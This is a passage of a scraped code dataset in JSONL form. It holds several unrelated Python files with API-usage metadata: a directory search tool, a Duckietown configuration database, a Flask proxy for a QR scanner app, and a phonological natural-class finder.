"call"}, {"api_name": "os.path.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 67, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 71, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 74, "usage_type": "name"}]} +{"seq_id": "41494429084", 
"text": "import json\r\nimport os\r\n\r\n\r\nclass FileSeach(object):\r\n def __init__(self, filter) -> None:\r\n self.__filter_ext = filter\r\n\r\n def collect(self, path) -> dict:\r\n ddir = {}\r\n ldir = []\r\n dirs = self.__subdir(path)\r\n\r\n for dir in dirs:\r\n if self.__filter(os.path.join(path,dir)):\r\n ldir.append(dir)\r\n dict = self.collect(os.path.join(path, dir))\r\n if dict:\r\n ldir.append(dict)\r\n if ldir:\r\n ddir[os.path.split(path)[1]] = ldir\r\n\r\n return ddir\r\n\r\n def __subdir(self, path) -> list:\r\n dirs_and_files = os.listdir(path)\r\n dirs = []\r\n for d in dirs_and_files:\r\n dpath = os.path.join(path, d)\r\n if os.path.isdir(dpath):\r\n dirs.append(d)\r\n return dirs\r\n\r\n def __filter(self, path) -> bool:\r\n dirs_and_files = os.listdir(path)\r\n for f in dirs_and_files:\r\n fpath = os.path.join(path, f)\r\n if os.path.isfile(fpath):\r\n ext = os.path.split(fpath)[1]\r\n if ext in self.__filter_ext:\r\n return True\r\n return False\r\n\r\n\r\nif \"__main__\" == __name__:\r\n fs = FileSeach(['CMakeLists.txt'])\r\n dict = fs.collect('D:\\\\Code\\\\Work\\\\CAT1_HPM\\\\MPU\\\\LTE01R02A09_C_SDK_U')\r\n # print(dict)\r\n print(json.dumps(dict))\r\n", "repo_name": "Nessaih/Nessaih", "sub_path": "Code/Python/Simple/FileSearch.py", "file_name": "FileSearch.py", "file_ext": "py", "file_size_in_byte": 1383, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "14509161646", "text": "from collections import defaultdict\nfrom typing import Dict, Sequence, Union\n\nimport yaml\n\nimport duckietown_code_utils as dtu\nfrom easy_node.node_description.configuration import EasyNodeConfig, load_configuration_for_nodes_in_package\nfrom .get_configuration_files import get_all_configuration_files\n\n\nclass ValidationError(Exception):\n pass\n\n\nclass ConfigDB:\n _singleton = None\n\n def __init__(self):\n # Load all configuration\n # filename2contents = look_everywhere_for_config_files()\n\n dtu.logger.debug(\"Reading configuration files...\")\n self.configs = get_all_configuration_files()\n self.package2nodes = {}\n\n packages = dtu.get_list_of_packages_in_catkin_ws()\n\n 
dtu.logger.debug(f\"Reading packages configuration for {packages}\")\n for p in packages:\n self.package2nodes[p] = load_configuration_for_nodes_in_package(p)\n\n dtu.logger.debug(\"Validating configuration...\")\n\n for i, c in enumerate(self.configs):\n try:\n self.validate_file(c)\n c = c._replace(valid=True)\n except ValidationError as e:\n c = c._replace(valid=False)\n c = c._replace(error_if_invalid=str(e))\n\n self.configs[i] = c\n\n def validate_file(self, c):\n # first, check that indeed we have a package by that name\n if not c.package_name in self.package2nodes:\n msg = f'Invalid package \"{c.package_name}\".'\n raise ValidationError(msg)\n # check that there is a node by that name\n if not c.node_name in self.package2nodes[c.package_name]:\n msg = f'No node \"{c.node_name}\" in package \"{c.package_name}\". '\n raise ValidationError(msg)\n # check that all the extends exist\n for cn in c.extends:\n if not self.config_exists(c.package_name, c.node_name, cn): # FIXME - doesn't exist\n msg = f\"Referenced config {c.package_name}/{c.node_name}/{cn} does not exist. \"\n raise ValidationError(msg)\n # Finally, check that the values correspond to values that we have\n # in the node configuration\n node_config = self.package2nodes[c.package_name][c.node_name]\n assert isinstance(node_config, EasyNodeConfig)\n known = node_config.parameters\n for k in c.values:\n if k not in known:\n msg = f'The parameter \"{k}\" is not known.\\nKnown: {sorted(known)}.'\n raise ValidationError(msg)\n\n def find(self, package_name: str, node_name: str, config_name, date):\n results = []\n for c in self.configs:\n match = (\n (package_name == c.package_name)\n and (node_name == c.node_name)\n and (config_name == c.config_name)\n )\n if match:\n results.append(c)\n if len(results) > 1:\n raise NotImplementedError(\"Sort by date\")\n if results:\n return results[0]\n else:\n return None\n\n def resolve(self, package_name: str, node_name: str, config_sequence: Union[list, tuple], date=None):\n \"\"\"Returns a QueryResult\"\"\"\n if len(config_sequence) == 0:\n msg = f\"Invalid empty config_sequence while querying for {package_name}/{node_name}\"\n raise ValueError(msg)\n values = {}\n origin = {}\n origin_filename = {}\n\n if not package_name in self.package2nodes:\n msg = f'Could not find package \"{package_name}\"; I know {sorted(self.package2nodes)}.'\n raise dtu.DTConfigException(msg)\n nodes = self.package2nodes[package_name]\n if not node_name in nodes:\n msg = f'Could not find node \"{node_name}\" in package \"{package_name}\"; I know {sorted(nodes)}.'\n raise dtu.DTConfigException(msg)\n\n node_config = nodes[node_name]\n all_keys = list(node_config.parameters)\n\n overridden = defaultdict(lambda: [])\n using = []\n for config_name in config_sequence:\n if config_name == \"defaults\":\n using.append(config_name)\n\n for p in list(node_config.parameters.values()):\n\n if p.has_default:\n values[p.name] = p.default\n origin_filename[p.name] = node_config.filename\n origin[p.name] = config_name\n\n else:\n c = self.find(package_name, node_name, config_name, date=date)\n if c is not None:\n using.append(config_name)\n\n for k, v in list(c.values.items()):\n if k in values:\n overridden[k].append(origin[k])\n values[k] = v\n origin_filename[k] = c.filename\n origin[k] = config_name\n\n if not using:\n msg = (\n f\"Cannot find any configuration for {package_name}/{node_name} with config sequence \"\n f\"{':'.join(config_sequence)}\"\n )\n raise dtu.DTConfigException(msg)\n\n return QueryResult(\n 
package_name, node_name, config_sequence, all_keys, values, origin, origin_filename, overridden\n )\n\n\ndef get_config_db() -> ConfigDB:\n if ConfigDB._singleton is None:\n ConfigDB._singleton = dtu.get_cached(\"ConfigDB\", ConfigDB)\n return ConfigDB._singleton\n\n\nclass QueryResult:\n def __init__(\n self, package_name, node_name, config_sequence, all_keys, values, origin, origin_filename, overridden\n ):\n self.all_keys = all_keys\n self.values = values\n self.origin = origin\n self.package_name = package_name\n self.node_name = node_name\n self.config_sequence = config_sequence\n self.origin_filename = origin_filename\n self.overridden = overridden\n assert isinstance(config_sequence, (list, tuple))\n\n def is_complete(self):\n return len(self.all_keys) == len(self.values)\n\n def __str__(self):\n s = f\"Configuration result for node `{self.node_name}` (package `{self.package_name}`)\"\n s += f\"\\nThe configuration sequence was {list(self.config_sequence)}.\"\n s += \"\\nThe following is the list of parameters set and their origin:\"\n s += \"\\n\" + dtu.indent(config_summary(self.all_keys, self.values, self.origin), \" \")\n return s\n\n\n# @dtu.contract(all_keys='seq(str)', values='dict', origin='dict(str:str)')\ndef config_summary(all_keys: Sequence[str], values: dict, origin: Dict[str, str]) -> str:\n table = []\n table.append([\"-\" * len(_) for _ in table[0]])\n for k in all_keys:\n if k in values:\n v = yaml.dump(values[k])\n v = v.strip()\n if v.endswith(\"...\"):\n v = v[:-3]\n v = v.strip()\n table.append([k, v, dtu.friendly_path(origin[k])])\n else:\n table.append([k, \"(unset)\", \"(not found)\"])\n return dtu.format_table_plus(table, 4)\n", "repo_name": "DailyL/Sim2Real_autonomous_vehicle", "sub_path": "evaluation_ws/src/easy_node/include/easy_node/user_config/db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 7064, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "duckietown_code_utils.logger.debug", "line_number": 22, "usage_type": "call"}, {"api_name": "duckietown_code_utils.logger", "line_number": 22, "usage_type": "attribute"}, {"api_name": "get_configuration_files.get_all_configuration_files", "line_number": 23, "usage_type": "call"}, {"api_name": "duckietown_code_utils.get_list_of_packages_in_catkin_ws", "line_number": 26, "usage_type": "call"}, {"api_name": "duckietown_code_utils.logger.debug", "line_number": 28, "usage_type": "call"}, {"api_name": "duckietown_code_utils.logger", "line_number": 28, "usage_type": "attribute"}, {"api_name": "easy_node.node_description.configuration.load_configuration_for_nodes_in_package", "line_number": 30, "usage_type": "call"}, {"api_name": "duckietown_code_utils.logger.debug", "line_number": 32, "usage_type": "call"}, {"api_name": "duckietown_code_utils.logger", "line_number": 32, "usage_type": "attribute"}, {"api_name": "easy_node.node_description.configuration.EasyNodeConfig", "line_number": 61, "usage_type": "argument"}, {"api_name": "typing.Union", "line_number": 85, "usage_type": "name"}, {"api_name": "duckietown_code_utils.DTConfigException", "line_number": 96, "usage_type": "call"}, {"api_name": "duckietown_code_utils.DTConfigException", "line_number": 100, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 105, "usage_type": "call"}, {"api_name": "duckietown_code_utils.DTConfigException", "line_number": 135, "usage_type": "call"}, {"api_name": "duckietown_code_utils.get_cached", "line_number": 
144, "usage_type": "call"}, {"api_name": "duckietown_code_utils.indent", "line_number": 169, "usage_type": "call"}, {"api_name": "typing.Sequence", "line_number": 174, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 174, "usage_type": "name"}, {"api_name": "yaml.dump", "line_number": 179, "usage_type": "call"}, {"api_name": "duckietown_code_utils.friendly_path", "line_number": 184, "usage_type": "call"}, {"api_name": "duckietown_code_utils.format_table_plus", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "27536844914", "text": "\"\"\"\nA proxy whilst the api doesn't have the proper csrf headers\n\"\"\"\nimport os\nimport json\nimport base64\nimport logging\nimport platform\nfrom io import BytesIO\nfrom pprint import pprint\nfrom os.path import join, exists, expandvars\n\nimport flask\nimport qrcode\nimport requests\n\nfrom webassets_babel import BabelFilter\nfrom webassets import Environment, Bundle\nfrom webassets.exceptions import FilterError\nfrom webassets.filter import register_filter\n\nlogging.basicConfig(level=logging.DEBUG)\n\napp = flask.Flask(__name__)\nmy_env = Environment(directory='static/', url='static/')\nmy_env.debug = 'HEROKU' not in os.environ\n\nif platform.system() == 'Windows':\n npm = expandvars('%AppData%/npm')\n my_env.config.setdefault('BABEL_BIN', join(npm, 'babel.cmd'))\n PRESET_PATH = join(npm, \"node_modules/RedQR/\")\nelse:\n PRESET_PATH = \"/app/\"\nPRESET_PATH = join(PRESET_PATH, \"node_modules\")\nassert exists(PRESET_PATH)\nPRESETS = ['react', 'es2015']\nPRESETS = ','.join(\n join(PRESET_PATH, 'babel-preset-{}'.format(name))\n for name in PRESETS\n)\n\n\n@register_filter\nclass BetterBabelFilter(BabelFilter):\n def get_executable_list(self, input_filename, output_filename):\n return (\n super().get_executable_list(input_filename, output_filename) +\n ['--presets', PRESETS]\n )\n\n\ndef build_bundles():\n js = Bundle(\n 'js/api.js',\n 'js/camera.js',\n 'js/qr_scanner.jsx',\n 'js/screen.jsx',\n 'js/options.jsx',\n 'js/main.jsx',\n filters=(\n 'babel',\n # 'jsmin'\n ),\n output='gen/packed.js'\n )\n js.config.babel_options = {\n 'highlightCode': False,\n }\n my_env.register('js_all', js)\n deps = Bundle(\n \"js/vendor/jquery.dev.js\",\n \"js/vendor/foundation.min.js\",\n \"js/vendor/llqrcode.js\",\n \"js/vendor/modernizr-latest.js\",\n \"js/vendor/underscore.js\",\n \"js/vendor/react/react-with-addons.js\",\n \"js/vendor/react/react-dom.js\",\n filters='jsmin',\n output='gen/deps.js'\n )\n my_env.register('deps', deps)\n return my_env\n\n\ndef get_urls():\n try:\n urls = my_env['js_all'].urls()\n deps = my_env['deps'].urls()\n\n pprint(urls + deps)\n\n return deps + urls\n except FilterError as e:\n e.args = (e.args[0].replace('\\\\n', '\\n'),)\n raise e\n\n\n@app.route(\"/\")\ndef index():\n return flask.render_template('index.html', urls=get_urls())\n\n\ndef build_image(data):\n img = qrcode.make(data)\n\n fh = BytesIO()\n img.save(fh)\n b64 = base64.b64encode(fh.getvalue())\n\n return b'data:image/png;base64,' + b64\n\n\n@app.route(\"/tests\")\ndef tests():\n with open('static/tests.json') as fh:\n tests = json.load(fh)\n\n images = {\n k: {\n \"desc\": v['desc'],\n \"img\": build_image(k).decode()\n }\n for k, v in tests.items()\n }\n\n return flask.render_template('tests.html', tests=images)\n\n\n@app.route(\"/ticket/signin\")\ndef proxy_signin():\n r = requests.request(\n flask.request.method,\n 'http://events.rflan.org/ticket/signin',\n params=flask.request.args\n )\n if not r.ok:\n print(r.text)\n raise 
flask.HTTPError(r.status_code)\n return r.text\n\n\n@app.route(r\"/.well-known/acme-challenge.*\")\ndef lets_encrypt():\n return os.environ.get(\n 'LETS_ENCRYPT_CHALLENGE',\n 'not set'\n )\n\n\nif __name__ == '__main__':\n print('building bundles')\n build_bundles()\n get_urls()\n print('bundles built')\n\n app.run('0.0.0.0', os.environ.get(\"PORT\", 8888), my_env.debug)\n", "repo_name": "Mause/js_qr_scanner", "sub_path": "proxy.py", "file_name": "proxy.py", "file_ext": "py", "file_size_in_byte": 3598, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.basicConfig", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 24, "usage_type": "call"}, {"api_name": "webassets.Environment", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "platform.system", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.expandvars", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "webassets_babel.BabelFilter", "line_number": 44, "usage_type": "name"}, {"api_name": "webassets.filter.register_filter", "line_number": 43, "usage_type": "name"}, {"api_name": "webassets.Bundle", "line_number": 53, "usage_type": "call"}, {"api_name": "webassets.Bundle", "line_number": 70, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 90, "usage_type": "call"}, {"api_name": "webassets.exceptions.FilterError", "line_number": 93, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 100, "usage_type": "call"}, {"api_name": "qrcode.make", "line_number": 104, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 106, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 108, "usage_type": "call"}, {"api_name": "json.load", "line_number": 116, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 126, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 131, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.HTTPError", "line_number": 138, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 144, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 144, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 156, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 156, "usage_type": "attribute"}]} +{"seq_id": "4865263989", "text": "#!/usr/bin/env python3\n# coding: utf-8 \n\n'''\na module that identifies all unique natural classes defined by the feature combinations in a table of phonological features.\n\ndependencies are standard modules (itertools, sys, os)\n\nThe main functions:\n\nFEAT LIST TO SEGS LOOKUP\n\tfeats_to_segs_wrapper(featlist, featfilepath)\t\n\nNAT CLASS DICTIONARY\n\twrap_classes(featfilepath)\n\nGETTING ALL THE CONSONANTS\n\tget_consonants(featfilepath)\n\nLook 
through the rest for more\n\n'''\n\nimport os\nimport itertools\nimport sys\n\n\nimport messages as msg\n\n\n\ndef read_feat_file(featfilepath, **kwargs):\n\t'''\n\tthe input argument is a path to features.txt, tab-formatted according to Hayes and Wilson rules\n\treturns a vector of feature names, and a vector of segments plus their feature values in order\n\tfeatnames: [syll, cons, son, dor, ...]\n\tseglines: [k, -, -, -, +, ...] \n\t'''\n\ttry:\n\t\twith open(featfilepath, 'r', encoding='utf-8') as f:\n\t\t\tfeats = f.readlines()\n\t\t\tfeatnames = feats[0].strip().split('\\t')\n\t\t\tseglines = [x.strip().split('\\t') for x in feats[1:]]\n\t\t\treturn (featnames,seglines)\n\texcept FileNotFoundError:\n\t\tmsg.env_render(message=f'could not open {featfilepath}', **kwargs)\n\t\traise SystemExit\n\ndef segs_to_feats(featlines, **kwargs):\n\t'''\n\ttakes as input a tuple: (featnames, seglines) see read_feat_file\n\treturns a dictionary with segment name keys and +feat -feat lists as values\n\t{k: [-syll, -cons, -son, +dor, ...], p: [], etc}\n\t'''\n\tfeatnames = featlines[0]\n\tseglines = featlines[1]\n\tsegdict = {}\n\tfor line in seglines:\n\t\tsegdict[line[0]]=[]\n\t\tfor feat in featnames:\n\t\t\tfeatvalue = line[featlines[0].index(feat)+1]\n\t\t\tif not featvalue in ['+', '-', '0']:\n\t\t\t\tkwargs['message']='Your feature file is malformed. Feature values have to be \"+\", \"-\", or \"0\".'\n\t\t\t\tmsg.env_render(**kwargs)\n\t\t\tif not featvalue=='0':\n\t\t\t\tsegdict[line[0]].append(featvalue+feat)\n\treturn segdict\n\n\ndef make_feat_vectors(featlines):\n\t'''\n\ttakes as input a tuple: (featnames, seglines) see read_feat_file\n\treturns a dictionary of feature values along with segments that have those feature values.\n\te.g.,\n{-syll: [k, t, p, w, j, n,...]}\n why is it called \"make_feat_vectors\"? who knows\n\t'''\n\tfeatdict = {}\n\tfor feat in featlines[0]:\n\t\tfeatdict[\"+\"+feat]=[]\n\t\tfeatdict[\"-\"+feat]=[]\n\t\tfeatindex = featlines[0].index(feat)\n\t\tfor line in featlines[1]:\n\t\t\tseg = line[0]\n\t\t\tfeatvalue = line[featindex+1]\n\t\t\tif featvalue==\"+\":\n\t\t\t\tfeatdict['+'+feat].append(seg)\n\t\t\telif featvalue==\"-\":\n\t\t\t\tfeatdict[\"-\"+feat].append(seg)\n\t#drop feature values not associated with seg lists (e.g., -dorsal if dorsal is privative)\n\tfinaldic = {}\n\tfor x in featdict:\n\t\tif featdict[x]:\n\t\t\tfinaldic[x] = featdict[x] \n\treturn finaldic \n\n\n\ndef check_feats(featlines, **kwargs):\n '''\n returns seg and feat value if the feature specifications of one seg are a proper subset of the other. when this holds, the first seg cannot be uniquely identified using its features, so the user should be told.\n '''\n segdict = segs_to_feats(featlines)\n problemsegs = []\n for seg, otherseg in itertools.combinations(segdict.keys(), 2):\n if set(segdict[seg]).issubset(set(segdict[otherseg])):\n problemsegs.append((seg, otherseg))\n if not problemsegs:\n kwargs['message'] = \"\\nThe new feature file is well-formed. 
for seg, otherseg in itertools.combinations(segdict.keys(), 2):\n        if set(segdict[seg]).issubset(set(segdict[otherseg])):\n            problemsegs.append((seg, otherseg))\n    if not problemsegs:\n        kwargs['message'] = \"\\nThe new feature file is well-formed. All the segments can be uniquely identified.\\n\"\n        msg.env_render(**kwargs)\n        return True\n    else:\n        kwargs['message'] = \"\\nThe new feature file does not allow certain segments to be distinguished from each other:\\n\\n\"\n        msg.env_render(**kwargs)\n        for x in problemsegs:\n            kwargs['message']=f'\\n{x[0]} has a subset of the features of {x[1]}'\n            msg.env_render(**kwargs)\n        return False \n    \n    \n\ndef get_nat_classes(featlines, **kwargs):\n    '''\n    takes as input a tuple: (featnames, seglines) see read_feat_file\n    returns a dictionary of natural classes as keys, and segments as values\n    {-son,+cons: [p, t, n, l, ...]}\n    '''\n    segdict = segs_to_feats(featlines)\n    featdict = make_feat_vectors(featlines)\n    #find all pairs of segs that share feature values:\n    natclasslist = [[feat] for feat in featdict]\n    print(natclasslist)\n    for seg in segdict:\n        for otherseg in segdict:\n            overlap = set(segdict[seg]) & set(segdict[otherseg])\n            if len(overlap)>0 and sorted(overlap) not in natclasslist:\n                natclasslist.append(sorted(overlap))\n    natclassdic = {}\n    #compile lists of segments that natural classes expand to:\n    for cl in natclasslist:\n        clname = ','.join(sorted(cl))\n        natclassdic[clname]=[]\n        #for every seg, check if its feature values are in that natural class description\n        for seg in segdict:\n            if set(cl).issubset(set(segdict[seg])): \n                natclassdic[clname].append(seg)\n    kwargs['message']=f'\\nNumber of natural classes: {len(natclassdic)}'\n    msg.env_render(**kwargs)\n    return natclassdic\n\ndef feat_to_seg_lookup(feats, featdict):\n    '''\n    given a list of features (feats) and a dictionary of them (featdict), returns all the segs that have that feature combo\n    '''\n    segs = []\n    for feat in feats:\n        segs.append(set(featdict[feat]))\n    return sorted(list(set.intersection(*segs)))\n\n\n\ndef feats_to_segs_wrapper(feats, featfilepath):\n\t'''\n\ttakes as args a list of features (in any order), and a path to the feature file\n    returns a list of segments\n\texample:\n\tpynatclasses.feats_to_segs_wrapper(['-syll', '-son', '+cont'], '/home/path/to/feats.txt')\n\tthis is just a wrapper for feat_to_seg_lookup, and it adds the extra step of opening the feature file (so this only happens once per feat line)\n\t'''\n\tfeatdict = make_feat_vectors(read_feat_file(featfilepath))\n\treturn feat_to_seg_lookup(feats, featdict)\n\ndef powerset(thing):\n\t'''\n\tuses itertools recipe for powerset. see python docs\n\t'''\n\tx = list(thing)\n\treturn itertools.chain.from_iterable(itertools.combinations(x, r) for r in range(len(x)+1))\n\ndef which_bigger(featdict, feat1, feat2):\n\t'''\n\tgiven a dictionary mapping features to segment lists, and a couple of feature names, finds out which feature covers a bigger natural class. 
if they are tied, it will return a boolean False\n\t'''\n\tif len(featdict[feat1])>len(featdict[feat2]):\n\t\treturn feat1\n\telif len(featdict[feat2])>len(featdict[feat1]):\n\t\treturn feat2\n\telse:\n\t\treturn False\n\ndef avg_cl_size(featdict, featlist):\n\t'''\n\tcalculates average number of segs that a class refers to\n\t'''\n\tlengths = [len(featdict[feat]) for feat in featlist]\n\ttry:\n\t\treturn sum(lengths)/len(featlist)\n\texcept ZeroDivisionError:\n\t\treturn 1 \n\n\ndef find_shortest_descriptions(natclassdic, featlines):\n\t'''\n\ttakes features from a verbose nat class dictionary, looks to see if there is a shorter subset of features that could describe same class, returns a less verbose dictionary of natural classes \n\t'''\n\tfinaldic = {}\n\tfeatdict = make_feat_vectors(featlines)\n\tfor cl in sorted(natclassdic):\n\t\tsegs = sorted(natclassdic[cl])\n\t\tfeats = sorted(cl.split(','))\n\t\tif len(feats)==1:\n\t\t\tfinaldic[cl]=segs\n\t\telse:\n\t\t\t#takes every sub-combination of features in the verbose dic\n\t\t\t#if any of them picks out an equiv. set of segs, takes the shortest \n\t\t\tequiv_classes = []\n\t\t\tfor featuple in powerset(feats):\n\t\t\t\tif (not len(featuple)==0) and (feat_to_seg_lookup(list(featuple), featdict) == segs):\n\t\t\t\t\tequiv_classes.append(sorted(list(featuple)))\n\t\t\tif len(equiv_classes)==1:\n\t\t\t\tfinaldic[cl] = segs\n\t\t\telse:\n\t\t\t\tlengths = [len(x) for x in equiv_classes]\n\t\t\t\tshortest=[x for x in equiv_classes if len(x)==min(lengths)]\n\t\t\t\tif len(shortest)==1:\n\t\t\t\t\tfinaldic[','.join(shortest[0])]=segs\n\t\t\t\telif len(shortest)>1:\n\t\t\t\t\tcl_sizes = [avg_cl_size(featdict, cl) for cl in equiv_classes]\n\t\t\t\t\t#reward classes for using \"bigger\" features\n\t\t\t\t\tgeneralest = [x for x in equiv_classes if avg_cl_size(featdict, x) == min(cl_sizes)]\n\t\t\t\t\t#and then give up, just give the first if there are ties\n\t\t\t\t\tfinaldic[','.join(generalest[0])]=segs\n\treturn finaldic\n\ndef wrap_classes(featfilepath):\n\t'''\n\ttakes in a full path to a feature file, Features.txt\n    returns a dictionary of natural classes, and the segs they contain:\n    natclassdict = {'-son,-cont': ['p', 't','k']...}\n\t'''\n\tfeatlines = read_feat_file(featfilepath)\n\treturn find_shortest_descriptions(get_nat_classes(featlines), featlines)\n\n\ndef get_consonants(featfilepath, **kwargs):\n\t'''\n\tgiven a full path to a features.txt file, returns a list of all the symbols that are specified as -syll or -syllabic. Those feature names are special.\n    kwargs are passed on to messages module for error handling\n\t'''\n\tfeatlines = read_feat_file(featfilepath)\n\tfeats = make_feat_vectors(featlines)\n\tif '-syll' in feats:\n\t\treturn feats['-syll']\n\telif '-syllabic' in feats:\n\t\treturn feats['-syllabic']\n\telse:\n\t\tkwargs['message']=f'\\nThe feature file {featfilepath.split(\"simulation\")[1]} does not have a column for -syll or -syllabic. The learner needs this feature to separate consonants from vowels. Fix this and try again.'\n\t\tmsg.env_render(**kwargs)\n
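\n# Usage sketch (hypothetical path): get_consonants('/home/you/simulation/Features.txt')\n# returns e.g. ['p', 't', 'k', 'm', 'n', ...], i.e. every segment specified as -syll(abic).\n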
\ndef get_vowels(featfilepath, **kwargs):\n    '''\n    first argument is a path to a features.txt file. returns a list of vowel symbols (segments specified as +syll or +syllabic). kwargs are passed to the messages module for error handling\n    '''\n    featlines = read_feat_file(featfilepath)\n    feats = make_feat_vectors(featlines)\n    if '+syll' in feats:\n        return feats['+syll']\n    elif '+syllabic' in feats:\n        return feats['+syllabic']\n    else:\n        msg.env_render(message=f'\\nThe feature file {featfilepath.split(\"simulation\")[1]} does not have a column for +syll or +syllabic. The learner needs this feature to separate vowels from true consonants. Fix this and try again.', **kwargs)\n\n\n\ndef get_vocoids(featfilepath, **kwargs):\n    '''\n    first argument is a path to a features.txt file. returns a list of vowel and glide symbols. kwargs are passed to the messages module for error handling\n    '''\n    featlines = read_feat_file(featfilepath)\n    feats = make_feat_vectors(featlines)\n    if '-cons' in feats:\n        return feats['-cons']\n    elif '-consonantal' in feats:\n        return feats['-consonantal']\n    else:\n        msg.env_render(message=f'\\nThe feature file {featfilepath.split(\"simulation\")[1]} does not have a column for -cons or -consonantal. The learner needs this feature to separate vocoids from true consonants. Fix this and try again.', **kwargs)\n\n\ndef outwrite_classes(featfilepath, outpath):\n\t'''\n\tgets natural classes from the file at featfilepath (needs to be a full path, /home/you/etc/Features.txt), and saves natural classes to a file at outpath.\n\t'''\n\timport os\n\tclassdic = wrap_classes(featfilepath)\n\tif not os.path.isfile(outpath):\n\t\twith open(outpath, 'w', encoding='utf-8') as f:\n\t\t\tfor cl in sorted(classdic):\n\t\t\t\tf.write(cl + '\\t' + ','.join(sorted(classdic[cl]))+'\\n')\n\telse:\n\t\toverwrite = input(\"File \" + outpath + \" already exists. Overwrite? [y/n] \")\n\t\tif overwrite=='y':\n\t\t\twith open(outpath, 'w', encoding='utf-8') as f:\n\t\t\t\tfor cl in sorted(classdic):\n\t\t\t\t\tf.write(cl + '\\t' + ','.join(sorted(classdic[cl]))+'\\n')\n\t\telse:\n\t\t\traise SystemExit\n\ndef seglist_to_feats(seglist, segdict):\n\t'''\n\treturns the unsigned names of all features specified (non-zero) for the segments in seglist.\n\t'''\n\tcontrastfeats = set()\n\tfor seg in seglist:\n\t\tcontrastfeats = contrastfeats.union({x for x in segdict[seg] if not x.startswith('0')})\n\treturn sorted(list({x.lstrip('+-') for x in contrastfeats}))\n\n\ndef make_custom_proj(feats, featfilepath, outpath, **kwargs):\n\t'''\n\tfeats: some feature(s) defining a natural class. e.g., '+son' or '-son,-cont'. If more than 1, must be a comma-separated string. no spaces\n\tfeatfilepath: path to feature file from which to read natural classes.\n\toutpath: where to put projections.txt.\n\tthis function writes a projections file in the format used by Wilson's MaxEnt learner:\n\tprojname feats_defining_class feats_visible_on_proj ngrams\n\tdefault proj always included.\n\tthis is a stand-alone function, it opens the feature file rather than be fed pre-read lines\n\t'''\n\tfeatl = [x.strip() for x in feats.split(',')]\n\tmsg.env_render(message=f'\\n{featl}', **kwargs)\n\tthesegs = feats_to_segs_wrapper(featl, featfilepath)\n\tfeats_to_project = seglist_to_feats(thesegs, segs_to_feats(read_feat_file(featfilepath))) + ['wb']\n\twith open(outpath, 'w', encoding='utf-8') as f:\n\t\tf.write('\\t'.join(['default', 'any', 'all', '3']) + '\\n')\n\t\tf.write('\\t'.join([feats, ''.join(featl), ','.join(feats_to_project), '2', '3']))\n \n\n\nif __name__ == '__main__':\n\timport sys\n\tHelpString = '\\n\\nThis utility finds natural classes in a feature file formatted according to Hayes and Wilson (2009, Linguistic Inquiry) conventions. 
